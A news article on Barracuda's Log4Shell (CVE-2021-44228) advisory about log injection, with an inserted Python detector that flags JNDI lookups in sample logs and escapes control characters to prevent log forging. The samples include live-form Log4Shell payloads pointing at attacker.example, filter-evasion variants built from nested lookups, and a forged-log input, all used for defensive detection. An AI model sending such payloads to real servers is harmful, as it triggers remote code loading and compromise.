Barracuda reports new RCE bug making APAC businesses open to log injection attacks

Cloud security solutions provider Barracuda has reported on a newly disclosed remote code execution (RCE) bug that leaves APAC businesses more exposed to log injection attacks.

Known as Log4Shell (CVE-2021-44228), it is a vulnerability in Apache Log4j 2, a widely used Java library for writing application log messages that many organisations depend on.

Logging is an important component of many applications and systems as developers and administrators use it to verify that software is functioning properly, and to determine specific details if it is not.

Log injection occurs when user-controlled input is written to a log without sanitisation. Among its risky consequences (data leaks, log forgery, denial of service), remote code execution (RCE) is the most serious: the attacker runs code inside the application with whatever access and privileges the application has. This can lead directly to data breaches, and it gives the attacker a foothold from which to move through the network and compromise systems and resources well beyond what the application itself can reach.

Log4Shell is an instance of this class of attack. Log4j 2 versions 2.0-beta9 to 2.14.1 evaluate lookup expressions such as ${jndi:ldap://host/path} when they appear in a logged message, so an attacker who can get such a string into a log (for example through an HTTP header) can cause the server to contact an attacker-controlled endpoint and load code from it, taking control of the machine over the Internet. Because it affects the most widely used logging framework on the Internet and is trivial to exploit, it was assigned the highest severity rating (CVSS 10.0) by both the National Vulnerability Database and the Apache Software Foundation.
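The two problems described above, generic log forging and Log4Shell-style JNDI lookups, as an added example (not code from the original article or from Barracuda). It runs over constructed log lines embedded in the script; the hostnames, paths and usernames are made up. The detector collapses the nested lookup forms commonly used to hide the word "jndi" (${lower:…}, ${upper:…} and ${…:-default}) before matching; it covers those evasions only, not every variant, and neutralising control characters before logging is defence in depth against log forging, not a substitute for the Log4j upgrade the article recommends.

```python
import re

# Constructed sample access-log lines (not real traffic). Three carry a
# Log4Shell-style JNDI lookup in the User-Agent; two of those hide "jndi"
# behind nested lookups, an evasion commonly seen in scanning traffic.
SAMPLE_LOG = [
    '10.0.0.5 GET /login ua="Mozilla/5.0"',
    '10.0.0.9 GET /login ua="${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 GET /login ua="${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '10.0.0.9 GET /login ua="${${env:NaN:-j}ndi:rmi://attacker.example/a}"',
    '10.0.0.7 GET /search q="${date:yyyy}"',   # a lookup, but not a JNDI one
]

# Innermost lookup forms that evasions lean on; each collapses to a literal.
_LOWER = re.compile(r'\$\{lower:([^${}]*)\}', re.IGNORECASE)
_UPPER = re.compile(r'\$\{upper:([^${}]*)\}', re.IGNORECASE)
_DEFAULT = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')      # ${env:X:-j}, ${::-j}
_JNDI = re.compile(r'\$\{jndi:([a-z]+):', re.IGNORECASE)


def normalise_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested lookups from the inside out until nothing changes.
    The round limit keeps hostile input from making this loop for long."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(r'\1', new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(lines):
    """Return (line_number, scheme) for every line that contains a JNDI
    lookup after de-obfuscation. Line numbers are 1-based."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = _JNDI.search(normalise_lookups(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# --- log forging: the generic log-injection problem -------------------------

def naive_log_line(user: str) -> str:
    """Vulnerable: user input is written to the log verbatim, so an embedded
    newline lets the attacker append a fake log record."""
    return f'WARN login failed user={user}'


def sanitise_for_log(value: str) -> str:
    """Escape control characters (CR, LF, ESC, ...) so attacker input cannot
    start a fake log line or drive a terminal; printable text is left alone."""
    return ''.join(
        ch if ch.isprintable() else ch.encode('unicode_escape').decode('ascii')
        for ch in value
    )


def safe_log_line(user: str) -> str:
    """Hardened counterpart of naive_log_line."""
    return f'WARN login failed user={sanitise_for_log(user)}'


# Constructed attacker input: a username with a forged "success" record attached.
FORGED_INPUT = 'bob\nINFO login succeeded user=admin'

if __name__ == '__main__':
    print(naive_log_line(FORGED_INPUT).count('\n') + 1, 'record(s) from the naive logger')
    print(safe_log_line(FORGED_INPUT))
    for n, scheme in find_jndi_lookups(SAMPLE_LOG):
        print(f'line {n}: JNDI lookup via {scheme}')
```

Run as-is it reports that the naive logger emitted two records from one login attempt, prints the single escaped record the hardened logger would write, and flags lines 2, 3 and 4 of the sample log (ldap, ldap, rmi) while ignoring the harmless ${date:…} lookup on line 5.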

Mark Lukie, Barracuda Systems Engineer Manager, Asia-Pacific, said: “These kinds of attacks are often overlooked, which makes them particularly dangerous, posing a threat to both data and network security. Any application using logging — even if not using log4j 2 or even Java — should be checked for possible log injection attacks and proper data sanitisation practices. The best way to protect against Log4Shell specifically is to upgrade to the latest version of log4j. However, for long-term protection against RCE threats, businesses need to find the right Web Application Firewall (WAF) and WAF-as-a-Service solutions to protect against log injection attempts, including those related to ‘Log4Shell’.”